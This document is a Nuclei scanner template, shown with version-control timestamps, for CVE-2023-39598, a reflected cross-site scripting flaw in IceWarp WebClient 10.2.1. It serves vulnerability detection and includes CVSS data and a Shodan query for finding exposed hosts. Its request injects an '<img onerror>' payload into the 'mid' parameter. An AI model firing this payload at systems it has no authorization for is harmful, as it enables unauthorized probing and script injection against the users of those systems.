2023-09-10 01:26:17 +00:00
id : CVE-2023-39598
2023-09-09 20:25:23 +00:00
info :
2023-09-10 01:26:17 +00:00
name : IceWarp Email Client - Cross Site Scripting
2023-09-09 20:25:23 +00:00
author : Imjust0
severity : medium
2023-09-10 01:26:17 +00:00
description : |
Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
2023-09-09 20:25:23 +00:00
reference :
2023-09-10 01:26:17 +00:00
- https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
- https://nvd.nist.gov/vuln/detail/CVE-2023-39598
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598
2023-10-14 11:27:55 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2023-39598
cwe-id : CWE-79
epss-score : 0.0062
2023-10-19 10:38:59 +00:00
epss-percentile : 0.76456
2023-10-14 11:27:55 +00:00
cpe : cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:*
2023-09-10 01:26:17 +00:00
metadata :
2023-10-14 11:27:55 +00:00
verified : "true"
2023-09-10 01:26:17 +00:00
max-request : 1
2023-10-14 11:27:55 +00:00
vendor : icewarp
product : webclient
2023-09-10 01:26:17 +00:00
shodan-query : title:"icewarp"
tags : cve,cve2023,xss,icewarp
2023-09-09 20:25:23 +00:00
http :
- method : GET
path :
2023-09-10 01:26:17 +00:00
- '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'
2023-09-09 20:25:23 +00:00
matchers-condition : and
matchers :
- type : word
words :
2023-09-10 01:26:17 +00:00
- "<img src=x onerror=confirm(document.domain)>"
- "icewarp"
condition : and
2023-09-10 14:34:42 +00:00
- type : word
part : header
words :
- "text/html"
2023-09-09 20:25:23 +00:00
- type : status
status :
- 200
2023-10-19 13:13:52 +00:00
# digest: 4b0a00483046022100c12f9c12682931bb446cdfe017b00ff644c1846957629f53162adb5d6399e53902210087f3c7b88684b660c98b78905f1c470b1cbc146703d37ef1b60ba8d1f164e4ee:922c64590222798bb761d5b6d8e72950